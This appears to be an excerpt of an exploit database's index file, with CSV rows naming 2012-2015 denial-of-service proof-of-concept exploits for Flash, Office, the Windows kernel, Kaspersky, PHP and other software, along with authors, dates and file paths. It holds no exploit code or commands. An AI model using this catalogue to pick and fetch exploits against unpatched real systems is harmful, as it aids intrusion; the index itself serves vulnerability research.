-37857,exploits/windows/dos/37857.txt,"Adobe Flash - '.SWF' Out-of-Bounds Memory Read (2)",2015-08-19,"Google Security Research",windows,dos, -37858,exploits/windows/dos/37858.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.TTF' File Embedded in SWF",2015-08-19,"Google Security Research",windows,dos, -37859,exploits/multiple/dos/37859.txt,"Adobe Flash - XML.childNodes Use-After-Free",2015-08-19,"Google Security Research",multiple,dos, -37860,exploits/windows/dos/37860.txt,"Adobe Flash AS2 - Color.setRGB Use-After-Free",2015-08-19,bilou,windows,dos, -37861,exploits/windows/dos/37861.txt,"Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (2)",2015-08-19,bilou,windows,dos, -37862,exploits/windows/dos/37862.txt,"Adobe Flash - Out-of-Bounds Read in UTF Conversion",2015-08-19,"Google Security Research",windows,dos, -37863,exploits/multiple/dos/37863.txt,"Adobe Flash - scale9Grid Use-After-Free",2015-08-19,"Google Security Research",multiple,dos, -37864,exploits/multiple/dos/37864.txt,"Adobe Flash - Drawing Methods 'this' Use-After-Free",2015-08-19,"Google Security Research",multiple,dos, -37865,exploits/multiple/dos/37865.txt,"Adobe Flash - attachMovie Use-After-Free",2015-08-19,"Google Security Research",multiple,dos, -37866,exploits/linux/dos/37866.txt,"Adobe Flash - Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",linux,dos, -37867,exploits/linux/dos/37867.txt,"Adobe Flash - Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",linux,dos, -37868,exploits/lin_x86-64/dos/37868.txt,"Adobe Flash (Linux x64) - Bad Dereference at 0x23c",2015-08-19,"Google Security Research",lin_x86-64,dos, -37869,exploits/linux/dos/37869.txt,"Adobe Flash - Pointer Crash in Button Handling",2015-08-19,"Google Security Research",linux,dos, -37870,exploits/linux/dos/37870.txt,"Adobe Flash - Pointer Crash in XML Handling",2015-08-19,"Google Security Research",linux,dos, -37871,exploits/multiple/dos/37871.txt,"Adobe Flash - swapDepths Use-After-Free",2015-08-19,"Google Security Research",multiple,dos, -37872,exploits/multiple/dos/37872.txt,"Adobe Flash - Bad Write in XML When Callback Modifies XML Tree During Property Delete",2015-08-19,"Google Security Research",multiple,dos, -37873,exploits/multiple/dos/37873.txt,"Adobe Flash - createTextField Use-After-Free",2015-08-19,"Google Security Research",multiple,dos, -37874,exploits/multiple/dos/37874.txt,"Adobe Flash - Type Confusion in TextRenderer.setAdvancedAntialiasingTable",2015-08-19,"Google Security Research",multiple,dos, -37875,exploits/windows/dos/37875.txt,"Adobe Flash - URL Resource Use-After-Free",2015-08-19,"Google Security Research",windows,dos, -37876,exploits/lin_x86-64/dos/37876.txt,"Adobe Flash - XMLSocket Destructor Not Cleared Before Setting User Data in connect",2015-08-19,"Google Security Research",lin_x86-64,dos, -37877,exploits/multiple/dos/37877.txt,"Adobe Flash - textfield.gridFitType Use-After-Free",2015-08-19,"Google Security Research",multiple,dos, -37878,exploits/multiple/dos/37878.txt,"Adobe Flash - FileReference Class Type Confusion",2015-08-19,"Google Security Research",multiple,dos, -37879,exploits/lin_x86-64/dos/37879.txt,"Adobe Flash - Heap Based Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",lin_x86-64,dos, -37880,exploits/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",lin_x86-64,dos, -37881,exploits/win_x86/dos/37881.txt,"Adobe Flash - Shared Object Type Confusion",2015-08-19,"Google Security Research",win_x86,dos, -37882,exploits/multiple/dos/37882.txt,"Adobe Flash - Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",multiple,dos, -37883,exploits/windows/dos/37883.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (3)",2015-08-19,bilou,windows,dos, -37884,exploits/windows/dos/37884.txt,"Adobe Flash - Heap Use-After-Free in SurfaceFilterList::C​reateFromScriptAtom",2015-08-19,bilou,windows,dos, -37893,exploits/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack Based Buffer Overflow",2015-08-20,Un_N0n,windows,dos,21 -37897,exploits/linux/dos/37897.html,"Midori Browser 0.3.2 - Denial of Service",2012-09-27,"Ryuzaki Lawlet",linux,dos, -37905,exploits/windows/dos/37905.rb,"PowerTCP WebServer for - ActiveX Denial of Service",2012-09-28,catatonicprime,windows,dos, -37908,exploits/windows/dos/37908.py,"Konica Minolta FTP Utility 1.0 - Remote Denial of Service (PoC)",2015-08-21,"Shankar Damodaran",windows,dos,21 -37909,exploits/windows/dos/37909.txt,"Microsoft Office 2007 - 'wwlib.dll' fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos, -37910,exploits/windows/dos/37910.txt,"Microsoft Office 2007 - 'wwlib.dll' Type Confusion (MS15-081)",2015-08-21,"Google Security Research",windows,dos, -37911,exploits/windows/dos/37911.txt,"Microsoft Office 2007 - 'OGL.dll' DpOutputSpanStretch::OutputSpan Out of Bounds Write (MS15-080)",2015-08-21,"Google Security Research",windows,dos, -37912,exploits/windows/dos/37912.txt,"Microsoft Office 2007 - 'mso.dll' Arbitrary Free (MS15-081)",2015-08-21,"Google Security Research",windows,dos, -37913,exploits/windows/dos/37913.txt,"Microsoft Office 2007 - 'mso.dll' Use-After-Free (MS15-081)",2015-08-21,"Google Security Research",windows,dos, -37914,exploits/windows/dos/37914.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",windows,dos, -37915,exploits/windows/dos/37915.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",windows,dos, -37916,exploits/windows/dos/37916.txt,"Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos, -37917,exploits/windows/dos/37917.txt,"Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos, -37918,exploits/windows/dos/37918.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos, -37919,exploits/windows/dos/37919.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos, -37920,exploits/windows/dos/37920.txt,"Microsoft Windows - 'ATMFD.DLL' Write to Uninitialized Address Due to Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos, -37921,exploits/windows/dos/37921.txt,"Microsoft Windows - 'ATMFD.dll' CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos, -37922,exploits/windows/dos/37922.txt,"Microsoft Windows - 'ATMFD.DLL' CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos, -37923,exploits/windows/dos/37923.txt,"Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads (MS15-021)",2015-08-21,"Google Security Research",windows,dos, -37924,exploits/windows/dos/37924.txt,"Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)",2015-08-21,"Google Security Research",windows,dos, -37954,exploits/windows/dos/37954.py,"Mock SMTP Server 1.0 - Remote Crash (PoC)",2015-08-24,"Shankar Damodaran",windows,dos,25 -37957,exploits/windows/dos/37957.txt,"GOM Audio 2.0.8 - '.gas' Crash (PoC)",2015-08-24,Un_N0n,windows,dos, -37966,exploits/windows/dos/37966.txt,"Microsoft Office 2007 - OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",windows,dos, -37967,exploits/windows/dos/37967.txt,"Microsoft Office 2007 - Malformed Document Stack Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos, -37976,exploits/windows/dos/37976.py,"VideoLAN VLC Media Player 2.2.1 - m3u8/m3u Crash (PoC)",2015-08-26,"Naser Farhadi",windows,dos, -37980,exploits/windows/dos/37980.pl,"Microsoft Excel - Denial of Service",2012-10-11,"Jean Pascal Pereira",windows,dos, -37981,exploits/windows/dos/37981.pl,"Microsoft Paint 5.1 - '.bmp' Denial of Service",2012-10-27,coolkaveh,windows,dos, -37984,exploits/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 - '.avi' File Local Denial of Service",2012-10-26,Am!r,windows,dos, -37986,exploits/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 - Stack Based Buffer Overflow",2015-08-27,Un_N0n,windows,dos, -37990,exploits/multiple/dos/37990.txt,"QEMU - Programmable Interrupt Timer Controller Heap Overflow",2015-08-27,"Google Security Research",multiple,dos, -37997,exploits/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service",2015-08-28,Vulnerability-Lab,ios,dos,3030 -38014,exploits/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22 -38021,exploits/multiple/dos/38021.pl,"Media Player Classic (MPC) 1.5 - WebServer Request Handling Remote Denial of Service",2012-11-16,X-Cisadane,multiple,dos, -38028,exploits/windows/dos/38028.pl,"PFTP Server 8.0f Lite - textfield Local Buffer Overflow (SEH)",2015-08-31,"Robbie Corley",windows,dos, -38031,exploits/windows/dos/38031.pl,"Microsoft Office 2007 - 'msxml5.dll' Crash (PoC)",2015-08-31,"Mohammad Reza Espargham",windows,dos, -38032,exploits/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service",2015-08-31,"Mohammad Reza Espargham",ios,dos, -38038,exploits/multiple/dos/38038.txt,"Splunk 4.3.1 - Denial of Service",2012-11-19,"Alexander Klink",multiple,dos, -38052,exploits/windows/dos/38052.py,"Ricoh DC (SR10) 1.1.0.8 - Denial of Service",2015-09-01,j2x6,windows,dos,21 -38053,exploits/windows/dos/38053.txt,"Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Based Buffer Overflow",2015-09-01,Un_N0n,windows,dos, -38054,exploits/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where (PoC)",2015-09-01,KoreLogic,windows,dos, -38055,exploits/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write (PoC)",2015-09-01,KoreLogic,windows,dos, -38059,exploits/bsd/dos/38059.c,"OpenBSD 4.x - Portmap Remote Denial of Service",2012-11-22,auto236751,bsd,dos, -38072,exploits/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash (PoC)",2015-09-02,"Meisam Monsef",windows,dos,21 -38085,exploits/win_x86-64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)",2015-09-06,"Robbie Corley",win_x86-64,dos, -38108,exploits/windows/dos/38108.txt,"Advantech Webaccess 8.0 / 3.4.3 - ActiveX Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos, -38120,exploits/php/dos/38120.txt,"PHP 5.4/5.5/5.6 - SplDoublyLinkedList 'Unserialize()' Use-After-Free",2015-09-09,"Taoguang Chen",php,dos, -38121,exploits/php/dos/38121.txt,"PHP GMP - 'unserialize()' Use-After-Free",2015-09-09,"Taoguang Chen",php,dos, -38122,exploits/php/dos/38122.txt,"PHP 5.4/5.5/5.6 - SplObjectStorage 'Unserialize()' Use-After-Free",2015-09-09,"Taoguang Chen",php,dos, -38123,exploits/php/dos/38123.txt,"PHP Session Deserializer - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos, -38125,exploits/php/dos/38125.txt,"PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free",2015-09-09,"Taoguang Chen",php,dos, -38132,exploits/linux/dos/38132.py,"Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",linux,dos, -38145,exploits/linux/dos/38145.txt,"OpenLDAP 2.4.42 - ber_get_next Denial of Service",2015-09-11,"Denis Andzakovic",linux,dos,389 -38146,exploits/windows/dos/38146.html,"Microsoft Internet Explorer 11 - Stack Underflow Crash (PoC)",2015-09-11,Mjx,windows,dos, -38165,exploits/windows/dos/38165.txt,"IKEView.exe Fox Beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,windows,dos, -38177,exploits/windows/dos/38177.txt,"IKEView.exe R60 - Stack Buffer Overflow",2015-09-14,hyp3rlinx,windows,dos, -38205,exploits/multiple/dos/38205.py,"BT Home Hub - 'uuid' Buffer Overflow",2013-01-08,"Zachary Cutlip",multiple,dos, -38208,exploits/multiple/dos/38208.py,"Colloquy - Remote Denial of Service",2013-01-09,Aph3x,multiple,dos, -38214,exploits/windows/dos/38214.txt,"Microsoft Excel 2007/2010/2013 - BIFFRecord Use-After-Free",2015-09-16,"Google Security Research",windows,dos, -38215,exploits/windows/dos/38215.txt,"Microsoft Office 2007 - BIFFRecord Length Use-After-Free",2015-09-16,"Google Security Research",windows,dos, -38216,exploits/windows/dos/38216.txt,"Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion",2015-09-16,"Google Security Research",windows,dos, -38217,exploits/windows/dos/38217.txt,"Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)",2015-09-16,"Google Security Research",windows,dos, -38225,exploits/windows/dos/38225.txt,"VBox Satellite Express 2.3.17.3 - Arbitrary Write",2015-09-17,KoreLogic,windows,dos, -38240,exploits/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash (PoC)",2015-09-18,spyk,windows,dos, -38249,exploits/multiple/dos/38249.txt,"MiniUPnP 1.4 - Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos, -38259,exploits/windows/dos/38259.py,"MASM32 11R - Crash (PoC)",2015-09-22,VIKRAMADITYA,windows,dos, -38262,exploits/osx/dos/38262.txt,"Apple Mac OSX Regex Engine (TRE) - Integer Signedness / Overflow",2015-09-22,"Google Security Research",osx,dos, -38263,exploits/osx/dos/38263.txt,"Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos, -38264,exploits/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos, -38265,exploits/win_x86/dos/38265.txt,"Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win_x86,dos, -38266,exploits/win_x86/dos/38266.txt,"Microsoft Windows Kernel - 'DeferWindowPos' Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos, -38267,exploits/win_x86/dos/38267.txt,"Microsoft Windows Kernel - 'UserCommitDesktopMemory' Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos, -38268,exploits/win_x86/dos/38268.txt,"Microsoft Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos, -38269,exploits/win_x86/dos/38269.txt,"Microsoft Windows Kernel - 'HmgAllocateObjectAttr' Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos, -38270,exploits/win_x86/dos/38270.txt,"Microsoft Windows Kernel - 'win32k!vSolidFillRect' Buffer Overflow (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos, -38271,exploits/win_x86/dos/38271.txt,"Microsoft Windows Kernel - 'SURFOBJ' Null Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos, -38272,exploits/windows/dos/38272.txt,"Microsoft Windows Kernel - Brush Object Use-After-Free (MS15-061)",2015-09-22,"Google Security Research",windows,dos, -38273,exploits/win_x86/dos/38273.txt,"Microsoft Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos, -38274,exploits/win_x86/dos/38274.txt,"Microsoft Windows Kernel - Null Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos, -38275,exploits/win_x86/dos/38275.txt,"Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win_x86,dos, -38276,exploits/win_x86/dos/38276.txt,"Microsoft Windows Kernel - 'FlashWindowEx​' Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos, -38277,exploits/win_x86/dos/38277.txt,"Microsoft Windows Kernel - 'bGetRealizedBrush' Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos, -38278,exploits/win_x86/dos/38278.txt,"Microsoft Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos, -38279,exploits/win_x86/dos/38279.txt,"Microsoft Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos, -38280,exploits/win_x86/dos/38280.txt,"Microsoft Windows Kernel - 'NtGdiStretchBlt' Pool Buffer Overflow (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos, -38281,exploits/windows/dos/38281.txt,"Kaspersky AntiVirus - VB6 Parsing Integer Overflow",2015-09-22,"Google Security Research",windows,dos, -38282,exploits/windows/dos/38282.txt,"Kaspersky AntiVirus - ExeCryptor Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos, -38283,exploits/windows/dos/38283.txt,"Kaspersky AntiVirus - PE Unpacking Integer Overflow",2015-09-22,"Google Security Research",windows,dos, -38284,exploits/windows/dos/38284.txt,"Kaspersky AntiVirus - '.DEX' File Format Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos, -38285,exploits/windows/dos/38285.txt,"Kaspersky AntiVirus - CHM Parsing Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,dos, -38286,exploits/windows/dos/38286.txt,"Kaspersky AntiVirus - UPX Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos, -38288,exploits/windows/dos/38288.txt,"Kaspersky AntiVirus - Yoda's Protector Unpacking Memory Corruption",2015-09-22,"Google Security Research",windows,dos, -38307,exploits/win_x86/dos/38307.txt,"Microsoft Windows Kernel - 'NtGdiBitBlt' Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos, -38317,exploits/windows/dos/38317.txt,"FreshFTP 5.52 - '.qfl' Crash (PoC)",2015-09-25,Un_N0n,windows,dos, -38336,exploits/windows/dos/38336.py,"Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos, -38337,exploits/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash (PoC)",2015-09-28,"Mohammad Reza Espargham",ios,dos, -38344,exploits/windows/dos/38344.txt,"Adobe Acrobat Reader - AFParseDate JavaScript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos, -38348,exploits/windows/dos/38348.txt,"Adobe Flash - 'uint' Capacity Field",2015-09-28,"Google Security Research",windows,dos, -38364,exploits/multiple/dos/38364.txt,"Varnish Cache - Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos, -38365,exploits/linux/dos/38365.txt,"Squid - 'httpMakeVaryMark()' Remote Denial of Service",2013-03-05,tytusromekiatomek,linux,dos, -38392,exploits/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial of Service",2013-03-07,"Alyssa Milburn",linux,dos, -38399,exploits/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos, -38404,exploits/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos, -38405,exploits/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos, -38419,exploits/windows/dos/38419.txt,"SmallFTPd - Denial of Service",2013-04-03,AkaStep,windows,dos, -38420,exploits/multiple/dos/38420.txt,"Google Chrome - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos, -38421,exploits/linux/dos/38421.txt,"Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service",2013-04-05,anonymous,linux,dos, -38422,exploits/linux/dos/38422.txt,"Apache Subversion - Remote Denial of Service",2013-04-05,"Greg McMullin",linux,dos, -38442,exploits/php/dos/38442.txt,"PHPMyLicense 3.0.0 < 3.1.4 - Denial of Service",2015-10-11,"Aria Akhavan Rezayat",php,dos, -38444,exploits/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' File Crush Application (Denial of Service)",2015-10-11,"mohammed Mohammed",win_x86,dos, -38475,exploits/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",hardware,dos, -38465,exploits/linux/dos/38465.txt,"Linux Kernel 3.2.1 - Tracing Multiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,dos, -38483,exploits/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos, -38485,exploits/windows/dos/38485.py,"VideoLAN VLC Media Player 2.2.1 - libvlccore '.mp3' Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos, -38490,exploits/multiple/dos/38490.txt,"Adobe Flash - 'IExternalizable.writeExternal' Type Confusion",2015-10-19,"Google Security Research",multiple,dos, -38493,exploits/hardware/dos/38493.txt,"Cisco Linksys WRT310N Router - Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",hardware,dos, -38498,exploits/windows/dos/38498.py,"Elecard MPEG Player - '.m3u' File Buffer Overflow",2013-04-27,metacom,windows,dos, -38538,exploits/multiple/dos/38538.py,"Code::Blocks - Denial of Service",2013-05-29,ariarat,multiple,dos, -38555,exploits/android/dos/38555.txt,"Samsung - 'm2m1shot' Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos, -38556,exploits/android/dos/38556.txt,"Samsung - 'seiren' Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos, -38557,exploits/android/dos/38557.txt,"Samsung fimg2d - FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos, -38558,exploits/android/dos/38558.txt,"Samsung - SecEmailComposer QUICK_REPLY_BACKGROUND Permissions",2015-10-28,"Google Security Research",android,dos, -38564,exploits/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos, -38566,exploits/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos, -38580,exploits/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service / Privilege Escalation (MS15-111)",2015-10-30,"Google Security Research",windows,dos, -38589,exploits/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos, -38595,exploits/multiple/dos/38595.txt,"Oracle VM VirtualBox 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos, -38610,exploits/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos, -38611,exploits/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos, -38612,exploits/android/dos/38612.txt,"Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash",2015-11-03,"Google Security Research",android,dos, -38613,exploits/android/dos/38613.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos, -38614,exploits/android/dos/38614.txt,"Samsung - libQjpeg Image Decoding Memory Corruption",2015-11-03,"Google Security Research",android,dos, -38615,exploits/windows/dos/38615.txt,"Python 2.7 hotshot Module - 'pack_string' Heap Buffer Overflow",2015-11-03,"John Leitch",windows,dos, -38616,exploits/multiple/dos/38616.txt,"Python 2.7 - 'array.fromstring' Method Use-After-Free",2015-11-03,"John Leitch",multiple,dos, -38617,exploits/windows/dos/38617.txt,"Python 2.7 - 'strop.replace()' Method Integer Overflow",2015-11-03,"John Leitch",windows,dos, -38618,exploits/windows/dos/38618.txt,"Python 3.3 < 3.5 - 'product_setstate()' Out-of-Bounds Read",2015-11-03,"John Leitch",windows,dos, -38620,exploits/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos, -38622,exploits/linux/dos/38622.txt,"libvirt - 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos, -38623,exploits/multiple/dos/38623.html,"RealNetworks RealPlayer - Denial of Service",2013-07-02,"Akshaysinh Vaghela",multiple,dos, -38626,exploits/multiple/dos/38626.py,"FileCOPA FTP Server - Remote Denial of Service",2013-07-01,Chako,multiple,dos, -38650,exploits/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash (PoC)",2015-11-07,"Luis Martínez",windows,dos, -39374,exploits/osx/dos/39374.c,"Apple Mac OSX Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos, -38659,exploits/windows/dos/38659.py,"POP Peeper 4.0.1 - Overwrite (SEH)",2015-11-09,Un_N0n,windows,dos, -38662,exploits/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos, -38681,exploits/linux/dos/38681.py,"FBZX 2.10 - Local Stack Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos, -38685,exploits/linux/dos/38685.py,"TACK 1.07 - Local Stack Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos, -38687,exploits/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field Overflow (SEH)",2015-11-12,"Nipun Jaswal",windows,dos, -38701,exploits/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,dos, -38702,exploits/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos, -38703,exploits/windows/dos/38703.txt,"TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos, -38705,exploits/windows/dos/38705.py,"Sam Spade 1.14 - Browse URL Buffer Overflow (PoC)",2015-11-16,"Nipun Jaswal",windows,dos, -38710,exploits/windows/dos/38710.py,"foobar2000 1.3.9 - '.pls' / '.m3u' / '.m3u8' Local Crash (PoC)",2015-11-16,"Antonio Z.",windows,dos, -38711,exploits/windows/dos/38711.py,"foobar2000 1.3.9 - '.asx' Local Crash (PoC)",2015-11-16,"Antonio Z.",windows,dos, -38713,exploits/windows/dos/38713.txt,"Microsoft Windows Kernel - 'win32k.sys' Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos, -38714,exploits/windows/dos/38714.txt,"Microsoft Windows Kernel - 'win32k.sys' Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos, -38734,exploits/windows/dos/38734.txt,"Kaspersky AntiVirus - Certificate Handling Directory Traversal",2015-11-16,"Google Security Research",windows,dos, -38735,exploits/windows/dos/38735.txt,"Kaspersky AntiVirus - '.DEX' File Format Memory Corruption",2015-11-16,"Google Security Research",windows,dos, -38736,exploits/windows/dos/38736.txt,"Kaspersky AntiVirus - '.ZIP' File Format Use-After-Free",2015-11-16,"Google Security Research",windows,dos, -38747,exploits/windows/dos/38747.py,"Pwstore - Denial of Service",2013-04-16,"Josep Pi Rodriguez",windows,dos, -38758,exploits/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos, -38759,exploits/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos, -38760,exploits/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field Overflow (SEH)",2015-11-19,"Luis Martínez",windows,dos, -38761,exploits/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash (PoC)",2015-11-19,"Vivek Mahajan",windows,dos, -38763,exploits/lin_x86/dos/38763.txt,"Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos, -38771,exploits/windows/dos/38771.py,"ShareKM - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos, -38778,exploits/linux/dos/38778.txt,"Blue Coat ProxySG 5.x and Security Gateway OS - Denial of Service",2013-09-23,anonymous,linux,dos, -38779,exploits/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos, -38787,exploits/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - '.PDF' Parsing Memory Corruption",2015-11-23,"Francis Provencher",windows,dos, -38788,exploits/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (1)",2015-11-23,"Francis Provencher",windows,dos, 